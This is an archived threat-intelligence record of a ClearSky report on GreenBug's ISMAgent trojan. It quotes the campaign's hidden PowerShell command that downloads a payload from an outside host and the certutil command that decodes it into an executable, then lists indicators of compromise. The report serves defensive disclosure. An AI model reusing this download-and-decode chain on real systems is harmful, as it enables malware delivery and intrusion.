{
	"id": "b800719e-feef-4cd7-a2a9-d1a085a7df9b",
	"created_at": "2026-04-06T00:08:55.824709Z",
	"updated_at": "2026-04-10T13:12:36.73813Z",
	"deleted_at": null,
	"sha1_hash": "7661eee9ccae41d315b9634587ad0776e57382dd",
	"title": "Recent ISMAgent Samples and Infrastructure by Iranian Threat Group GreenBug – ClearSky Cyber Security",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 59528,
	"plain_text": "Recent ISMAgent Samples and Infrastructure by Iranian Threat Group GreenBug – ClearSky Cyber Security\r\nPublished: 2017-08-28 · Archived: 2026-04-05 21:43:31 UTC\r\nRecently we detected new samples and infrastructure of ISMAgent, a trojan used by the Iranian threat group GreenBug. Interestingly, as part of the delivery mechanism, the malware is disguised as a base64-encoded digital certificate and decoded via certutil.exe. This post describes the new campaign.\r\nchange managment.dot\r\nSample change managment.dot (812d3c4fddf9bb81d507397345a29bb0) exploits CVE-2017-0199 and calls the following URL:\r\nhttp://www.msoffice-cdn[.]com/updatecdnsrv/prelocated/owa/auth/template.rtf\r\nwhich in turn runs this command:\r\n“C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe” -nologo -WindowStyle Hidden $webClient = New-Object System.Net.WebClient; $val = $webClient.DownloadString(‘https://a.pomf[.]cat/ntluca.txt’); add-content -path ‘C:\\Users\\USER\\AppData\\Roaming/srvRep.txt’ -value $val -force\r\nThe command downloads ntluca.txt from http://a.pomf[.]cat/ntluca.txt. Disguised as a base64 digital certificate, the file actually decodes to an ISMAgent sample (96b47c5af8652ac99150bf602a88498b) via the following command:\r\n“C:\\Windows\\System32\\certutil.exe” -decode C:\\Users\\USER\\AppData\\Roaming\\srvRep.txt C:\\Users\\USER\\AppData\\Roaming\\srvConhost.exe\r\nIndicators of compromise\r\nIndicators of compromise are presented below and are available on PassiveTotal.\r\nDomain cdnmsnupdate[.]com\r\nDomain msoffice-cdn[.]com\r\nURL http://74.91.19[.]122/action2/\r\nURL http://82.102.14[.]246/webdav/aws.exe\r\nURL http://www.msoffice-cdn[.]com/updatecdnsrv/prelocated/owa/auth/template.rtf\r\nURL http://a.pomf[.]cat/ntluca.txt\r\nIP 185.162.235.121\r\nIP 82.102.14.246\r\nIP 74.91.19.122\r\nHash 6d2f8a06534e2ebebc43295fb266a8ca\r\nHash 812d3c4fddf9bb81d507397345a29bb0\r\nHash 3d497c4711c0226d86a693a40891f9a1\r\nHash 96b47c5af8652ac99150bf602a88498b\r\nHash 66eaef10226fb279dba64bb5948bc85b\r\nHash 7d83715a9a6aabcbc621cc786de0c9ea\r\nHash 15d9d184b71d243ae5c005c68a045889\r\nwhoisName Neslihan Ozcivit\r\nwhoisEmail neslihan.ozcivit@mail.ru\r\nFilename aws.exe\r\nFilename Crypted.exe\r\nFilename document-gerenated-problem.exe\r\nFilename PolicyConverter.exe\r\nThe Maltego graph below depicts the relationships among the indicators.\r\nSource: http://www.clearskysec.com/ismagent/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"origins": [
		"web"
	],
	"references": [
		"http://www.clearskysec.com/ismagent/"
	],
	"report_names": [
		"ismagent"
	],
	"threat_actors": [
		{
			"id": "e58deb93-aff1-4be5-8deb-37fe8af0b7ed",
			"created_at": "2022-10-25T16:07:23.918534Z",
			"updated_at": "2026-04-10T02:00:04.789509Z",
			"deleted_at": null,
			"main_name": "Greenbug",
			"aliases": [
				"Greenbug",
				"Volatile Kitten"
			],
			"source_name": "ETDA:Greenbug",
			"tools": [],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "25896473-161f-411f-b76a-f11bb26c96bd",
			"created_at": "2023-01-06T13:46:38.75749Z",
			"updated_at": "2026-04-10T02:00:03.090307Z",
			"deleted_at": null,
			"main_name": "CHRYSENE",
			"aliases": [
				"Greenbug"
			],
			"source_name": "MISPGALAXY:CHRYSENE",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "6bba8e81-73af-4010-86dc-d43c408ca342",
			"created_at": "2023-01-06T13:46:38.553459Z",
			"updated_at": "2026-04-10T02:00:03.021597Z",
			"deleted_at": null,
			"main_name": "Greenbug",
			"aliases": [],
			"source_name": "MISPGALAXY:Greenbug",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434135,
	"ts_updated_at": 1775826756,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/7661eee9ccae41d315b9634587ad0776e57382dd.pdf",
		"text": "https://archive.orkl.eu/7661eee9ccae41d315b9634587ad0776e57382dd.txt",
		"img": "https://archive.orkl.eu/7661eee9ccae41d315b9634587ad0776e57382dd.jpg"
	}
}